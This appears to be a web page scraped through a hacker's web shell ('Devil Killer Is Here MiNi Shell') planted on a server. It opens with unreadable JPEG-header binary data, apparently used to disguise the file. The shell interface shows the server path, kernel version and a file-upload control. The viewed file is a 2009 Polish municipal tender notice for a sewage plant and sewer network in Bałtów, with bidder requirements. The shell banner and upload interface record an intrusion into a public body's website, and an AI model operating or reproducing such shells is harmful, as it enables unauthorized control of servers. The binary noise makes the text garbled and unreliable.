JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090909/310742-N-2009.html

<p class="kh_header"><b>Bałtów: Budowa oczyszczalni ścieków oraz sieci kanalizacji sanitarnej z przyłączami 
w Gminie Bałtów - I etap</b><br>
<b>Numer ogłoszenia: 310742 - 2009; data zamieszczenia: 09.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bałtów , Bałtów 32/1, 27-423 Bałtów, woj. świętokrzyskie, tel. 041 2641008, faks 041 2641303.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa oczyszczalni ścieków oraz sieci kanalizacji sanitarnej z przyłączami 
w Gminie Bałtów - I etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa oczyszczalni ścieków oraz sieci kanalizacji sanitarnej z przyłączami w Gminie Bałtów - I etap
Zakres robót obejmuje między innymi:
Budowa kanalizacji sanitarnej z przyłączami  w ms. Pętkowice, Pętkowice Kolonia:
- Budowa zbiorczych kanałów grawitacyjnych wykonanych z rur kanalizacyjnych PVC szereg ciężki S (SDR 34) SN 8 (kPa) o średnicy 200 x 5,9 mm - o łącznej długości  ok. 4432 mb,
- Budowa rurociągów tłocznych wykonanych z rur PE 100 szereg SDR 17 (PN10) - o łącznej długości  ok. 1473 mb,
- Budowa kanałów przyłączeniowych kanalizacji grawitacyjnej wykonanych z rur kanalizacyjnych PVC szereg średni N (SDR 41) SN 4 (kPa) o średnicy 160 x 4,0 mm - 
o łącznej długości  ok. 1768 mb,
- Budowa przepompowni indywidualnej - 1 szt.,
- Budowa przepompowni sieciowych  - 4 szt. (P-3, P-4, P-5, P-6).
Budowa kanalizacji sanitarnej z przyłączami  w ms. Skarbka, Bałtów, Rudka Bałtowska:
 - Budowa przewodów kanalizacji ciśnieniowej wykonanych z rur PE 100 SDR 17 o średnicach PE 63 mm - o łącznej długości  ok. 10011 mb , PE 75 mm -  o łącznej długości  ok. 1987 mb, PE 90 mm - o łącznej długości  ok. 922 mb, PE 110 mm - o łącznej długości  ok. 4695 mb, PE 160 mm - o łącznej długości  ok. 2841 mb,
- Budowa przewodów kanalizacji grawitacyjnej wykonanych z rur dwuściennych z PP o sztywnej obwodowej SN 8 oraz rur kanalizacyjnych kielichowych z PVC klasy S, SN 8 - Dn - 300 o łącznej długości  ok. 788 m, Dn - 250 o łącznej długości  ok. 3 m, Dn - 200 o łącznej długości  ok. 312 m, Dn - 160,0 o łącznej długości  ok. 72 m, 
- Budowa przyłączy ciśnieniowych  - 248 szt., w tym 232 przepompowni indywidualnych,
- Budowa pompowni tranzytowych  - 2 szt. (P-1, P-2), w tym tłocznia - P-2.
Budowa oczyszczalni ścieków w miejscowości Skarbka:
- Budowa mechaniczno biologicznej oczyszczalni ścieków działającej w oparciu o nitryfikacyjno -denitryfikacyjny osad czynny z jego tlenową stabilizacją - wg rozwiązania BIO - PAK o wydajności  200 m3 / dobę- 1 szt.
Na oczyszczalnie składają się następujące obiekty:
- pompownia ścieków,
- budynek techniczny z częścią socjalną,
- reaktor biologiczny  - I etap,
- punkt zlewny ścieków dowożonych - taca najazdowa,
- separator zanieczyszczeń stałych,
- zbiornik uśredniający ścieków dowożonych z pomiarem,
- zbiornik osadu, 
- budynek energetyczny - agregatownia i rozdzielnia,
- miejsca parkingowe - dla 2 pojazdów,
- wylot ścieków oczyszczonych,
- studzienki - rozprężne, pomiarowa ścieków oczyszczonych, wodomierzowa,
- osadnik wód opadowych.
Zagospodarowanie terenu oczyszczalni obejmuje również:
- ukształtowanie wysokościowe terenu w obrębie projektowanych obiektów,
- odcinek drogi dojazdowej i wjazd na teren oczyszczalni,
- układ dróg i placów n terenie oczyszczalni, 
- nasadzenia drzew i krzewów,
- uzbrojenie - sieci technologiczne, kanalizacja sanitarna lokalna, siec wodociągowa, siec dopływowa ścieków surowych, kanał odpływowy ścieków oczyszczonych, odcinek linii napowietrznej SN do stacji trafo słupowej, kable energetyczne (zasilające, sterowniczo - pomiarowe, oświetlenia terenu).
Szczegółowy opis i zakres przedmiotu zamówienia znajduje się w następujących dokumentach, które stanowią integralną część SIWZ, z uwzględnieniem najszerszego zakresu robót ujętego w którymkolwiek z tych dokumentów:
Budowa kanalizacji sanitarnej z przyłączami  w ms. Pętkowice, Pętkowice Kolonia:
- Projekt budowlany - stanowiący Załącznik Nr 1 - 1.21 do SIWZ,
- Przedmiar robót (Wykonawca traktuje przedmiary robót jako materiał pomocniczy) - stanowiący Załącznik Nr 2 do SIWZ,
- Specyfikacje techniczne wykonania i odbioru robót - stanowiące Załącznik Nr 3 - 3.1 do SIWZ.
Budowa kanalizacji sanitarnej z przyłączami  w ms. Skarbka, Bałtów, Rudka Bałtowska:
- Projekt budowlany - stanowiący Załącznik Nr 4 - 4.51 do SIWZ,
- Przedmiar robót (Wykonawca traktuje przedmiary robót jako materiał pomocniczy) - stanowiący Załącznik Nr 5 - 5.1 do SIWZ,
- Specyfikacje techniczne wykonania i odbioru robót - stanowiące Załącznik Nr 6 - 6.8 do SIWZ.
Budowa oczyszczalni ścieków w miejscowości Skarbka:
- Projekt budowlany - stanowiący Załącznik Nr 7 - 7.104 do SIWZ,
- Przedmiar robót (Wykonawca traktuje przedmiary robót jako materiał pomocniczy) - stanowiący Załącznik Nr 8 - 8.13 do SIWZ,
- Specyfikacje techniczne wykonania i odbioru robót - stanowiące Załącznik Nr 9 - 9.19 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.23.24.10-9, 45.23.24.23-3, 45.20.00.00-9, 45.25.22.00-0, 45.23.24.21-9, 45.23.14.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium.
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 300 000,00 zł
słownie zł: trzysta tysięcy 00/100<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - na potwierdzenie Wykonawca dołączy do oferty następujące dokumenty:
a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
c) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
d) Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
e)  Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - na potwierdzenie Wykonawca dołączy do oferty następujące dokumenty:
a) Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie.
Zamawiający wymaga od wykonawców wykazania doświadczenia w realizacji robót budowlanych poprzez wykazanie co najmniej jednego zadania odpowiadającego swoim rodzajem i wartością przedmiotowi niniejszego zamówienia tj.:
- wykonanie minimum jednej kanalizacji ciśnieniowej wraz z przepompowniami przydomowymi w ilości minimum 100 sztuk tych przepompowni oraz minimalnej wartości tego zadania 3 000 000,00 zł,
- wykonanie minimum jednej kanalizacji grawitacyjnej o minimalnej wartości tego zadania 2 000 000,00 zł,
lub (zamiennie do opisanych powyżej) wykonanie minimum jednej kanalizacji grawitacyjno - ciśnieniowej (mieszanej) o minimalnej wartości tego zadania 5 000 000,00 zł, przy czym ilość wykonanych przepompowni przydomowych nie może być mniejsza od 100 sztuk tych przepompowni.
- wykonanie lub modernizacja minimum jednej mechaniczno biologicznej oczyszczalni ścieków o wydajności minimum 150 m 3 /d oraz  minimalnej wartości tego zadania 1 000 000,00zł. 
b) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca oraz pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie tym wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował.
c)  Informację na temat przeciętnej liczby zatrudnionych pracowników lub liczebności personelu kierowniczego, w okresie ostatnich trzech lat, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie.
d) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie tym wykonawca wskazał osoby, którymi będzie dysponował.
Do wykazu należy dołączyć dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
- kierownik budowy sprawujący jednocześnie funkcję kierownika robót wodociągowychi kanalizacyjnych. Do informacji należy dołączyć następujące dokumenty dotyczące kierownika budowy/robót wodociągowych i kanalizacyjnych przewidzianego do realizacji zadania: dokument stwierdzający przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz aktualne zaświadczenie o wpisie na listę Okręgowej Izby Inżynierów Budownictwa.
- kierownik robót elektrycznych - do informacji należy dołączyć następujące dokumenty dotyczące kierownika robót elektrycznych przewidzianego do realizacji zadania: dokument stwierdzający przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz aktualne zaświadczenie o wpisie na listę Okręgowej Izby Inżynierów Budownictwa.
- kierownik robót drogowych - do informacji należy dołączyć następujące dokumenty dotyczące kierownika robót drogowych przewidzianego do realizacji zadania: dokument stwierdzający przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności drogowej oraz aktualne zaświadczenie o wpisie na listę Okręgowej Izby Inżynierów Budownictwa.
- kierownik robót konstrukcyjno-budowlanych - do informacji należy dołączyć następujące dokumenty dotyczące kierownika robót konstrukcyjno-budowlanych przewidzianego do realizacji zadania: dokument stwierdzający przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno - budowlanej oraz aktualne zaświadczenie o wpisie na listę Okręgowej Izby Inżynierów Budownictwa.
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - na potwierdzenie Wykonawca dołączy do oferty następujące dokumenty:
a) Informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę minimum 5 000 000,00 zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2. Polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 1 000 000,00 zł.
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia - na potwierdzenie Wykonawca dołączy do oferty następujące dokumenty:
a)Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne.
2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
2.1 Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2 Podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych. 
3. Zamawiający odrzuca ofertę jeżeli: 
3.1 Jest niezgodną z ustawą. 
3.2 Jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych. 
3.3 Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji.  
3.4 Zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.
3.5 Została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia. 
3.6 Zawiera błędy w obliczeniu ceny.
3.7 Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
3.8 Jest nieważna na podstawie odrębnych przepisów.
4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu 
o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:
1. Formularz ofertowy - wypełniony i podpisany przez wykonawcę - na formularzu stanowiącym Załącznik Nr 10 do SIWZ,
2.  Formularz cenowy - wypełniony i podpisany przez wykonawcę - na formularzu stanowiącym Załącznik Nr 11 do SIWZ.
Uwaga:
Do formularza cenowego Wykonawca dołącza kosztorys ofertowy (kalkulacja uproszczona, np. podstawa wyceny, opis robót, jednostka miary, ilość robót, cena jednostkowa, wartość robót) sporządzony na podstawie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz opisu  przedmiotu zamówienia w pkt III SIWZ.
Załączony przedmiar - stanowiący Załącznik Nr 2, 5-5.1, 8-8.13 do SIWZ,  stanowi materiał pomocniczy do wyliczenia ceny oferty. Wykonawca zobowiązany jest dokonać wyceny na podstawie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz opisu przedmiotu zamówienia w pkt III SIWZ z uwzględnieniem najszerszego zakresu robót ujętego w którymkolwiek z tych dokumentów z wykorzystaniem własnej wiedzy i doświadczenia w realizacji  robót.
Dołączenie kosztorysu do oferty nie wpływa na określony w SIWZ rodzaj wynagrodzenia, które ma formę ryczałtu. Kosztorys ofertowy Wykonawcy stanowi jedynie merytoryczne uzasadnienie oferowanej przez Wykonawców ceny, ułatwiające w dalszej kolejności ustalenie, czy oferowana cena nie jest ceną rażąco niską, oraz określenie zakresu robót, do których wykonania obowiązany jest wykonawca w ramach oferowanego wynagrodzenia. 
Brak wyceny jakiejkolwiek pozycji lub elementu robót, niezbędnych do funkcjonowania przedmiotu umowy w parametrach założonych w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót i opisie przedmiotu zamówienia w pkt III SIWZ, uznany będzie za włączenie brakującej pozycji lub elementu robót do innej ceny w wycenie ofertowej robót i pozycja ta nie będzie stanowić przedmiotu odrębnej płatności.
Koszty czynności towarzyszących realizacji zadania określone pkt III ppkt 2.1 SIWZ  należy uwzględnić  w kosztach ogólnych (pośrednich).
Wszystkie elementy ujęte w przedmiarze (Wykonawca traktuje przedmiary robót jako materiał pomocniczy), a nie ujęte w projekcie, na rysunkach i specyfikacjach technicznych wykonania i odbioru robót, lub ujęte w projekcie, na rysunkach i specyfikacjach technicznych wykonania i odbioru robót, a nie ujęte w przedmiarze winny być traktowane tak jakby były ujęte w każdym z wymienionych dokumentów.
3. Wzór umowy podpisany i parafowany na każdej stronie przez Wykonawcę - na formularzu stanowiącym Załącznik Nr 12 do SIWZ.
B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.  Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.
3. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4. Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych - na formularzu stanowiącym Załącznik Nr 13 do SIWZ.
 C. W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
1. Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie - na formularzu stanowiącym Załącznik Nr 14 do SIWZ.
Zamawiający wymaga od wykonawców wykazania doświadczenia w realizacji robót budowlanych poprzez wykazanie co najmniej jednego zadania odpowiadającego swoim rodzajem i wartością przedmiotowi niniejszego zamówienia tj.:
- wykonanie minimum jednej kanalizacji ciśnieniowej wraz z przepompowniami przydomowymi w ilości minimum 100 sztuk tych przepompowni oraz minimalnej wartości tego zadania 3 000 000,00 zł,
- wykonanie minimum jednej kanalizacji grawitacyjnej o minimalnej wartości tego zadania 2 000 000,00 zł,
lub (zamiennie do opisanych powyżej) wykonanie minimum jednej kanalizacji grawitacyjno - ciśnieniowej (mieszanej) o minimalnej wartości tego zadania 5 000 000,00 zł, przy czym ilość wykonanych przepompowni przydomowych nie może być mniejsza od 100 sztuk tych przepompowni.
- wykonanie lub modernizacja minimum jednej mechaniczno biologicznej oczyszczalni ścieków o wydajności minimum 150 m 3 /d oraz  minimalnej wartości tego zadania 1 000 000,00zł. 
2. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca oraz pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie tym wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował - na formularzu stanowiącym Załącznik Nr 15 do SIWZ.
3.  Informacja na temat przeciętnej liczby zatrudnionych pracowników lub liczebności personelu kierowniczego, w okresie ostatnich trzech lat, a w przypadku, gdy okres prowadzenia działalności jest krótszy - w tym okresie - na formularzu stanowiącym Załącznik Nr 16 do SIWZ.
4. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie tym wykonawca wskazał osoby, którymi będzie dysponował - na formularzu stanowiącym  Załącznik Nr 17 do SIWZ.
Do wykazu należy dołączyć dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (nie dotyczy pracowników nie będących kadrą kierowniczą):
 - kierownik budowy sprawujący jednocześnie funkcję kierownika robót wodociągowych i kanalizacyjnych. Do informacji należy dołączyć następujące dokumenty dotyczące kierownika budowy/robót wodociągowych i kanalizacyjnych przewidzianego do realizacji zadania: dokument stwierdzający przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz aktualne zaświadczenie o wpisie na listę Okręgowej Izby Inżynierów Budownictwa.
- kierownik robót elektrycznych - do informacji należy dołączyć następujące dokumenty dotyczące kierownika robót elektrycznych przewidzianego do realizacji zadania: dokument stwierdzający przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz aktualne zaświadczenie o wpisie na listę Okręgowej Izby Inżynierów Budownictwa.
